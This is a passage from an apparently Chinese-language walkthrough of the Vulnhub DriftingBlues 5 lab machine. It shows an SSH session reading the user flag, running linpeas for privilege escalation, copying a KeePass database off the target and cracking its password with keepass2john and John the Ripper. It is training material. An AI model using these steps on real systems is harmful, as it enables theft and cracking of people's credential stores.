ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:35: [hashed name]
~/.ssh/known_hosts:37: [hashed name]
~/.ssh/known_hosts:38: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.194' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gill@driftingblues:~$ id
uid=1000(gill) gid=1000(gill) groups=1000(gill)
gill@driftingblues:~$ ls
keyfile.kdbx user.txt
gill@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
gill@driftingblues:~$ ls -alh
total 24K
drwxr-xr-x 4 gill gill 4.0K Nov 19 22:11 .
drwxr-xr-x 4 root root 4.0K Feb 24 2021 ..
drwx------ 3 gill gill 4.0K Nov 19 22:11 .gnupg
-rwx------ 1 gill gill 2.0K Feb 24 2021 keyfile.kdbx
drwx------ 2 gill gill 4.0K Feb 24 2021 .ssh
-r-x------ 1 gill gill 1.8K Jan 3 2021 user.txt
拿到了user flag
提权
将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行该脚本,脚本输出结果没有有价值的信息。
但是在gill家目录下后kdbx文件,这种文件属于keepass软件,将其下载到本地
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wget http://192.168.56.194:8000/keyfile.kdbx
--2022-11-19 23:30:32-- http://192.168.56.194:8000/keyfile.kdbx
Connecting to 192.168.56.194:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2030 (2.0K) [application/octet-stream]
Saving to: ‘keyfile.kdbx’
keyfile.kdbx 100%[==================================================================================================================================>] 1.98K --.-KB/s in 0s
2022-11-19 23:30:32 (157 MB/s) - ‘keyfile.kdbx’ saved [2030/2030]
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ ls
37902.php db1.jpg dblogo.png keyfile.kdbx linpeas.sh nmap_full_scan pass_wordlist pubring.kbx trustdb.gpg
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ keepass2john keyfile.kdbx > hashes
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre (keyfile)
1g 0:00:00:48 DONE (2022-11-19 23:31) 0.02047g/s 141.0p/s 141.0c/s 141.0C/s winston1..palomita
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
访问网站:链接:https://app.keeweb.info/
将keyfile.kdbx上传到上述网站,并输入用John工具破解的密码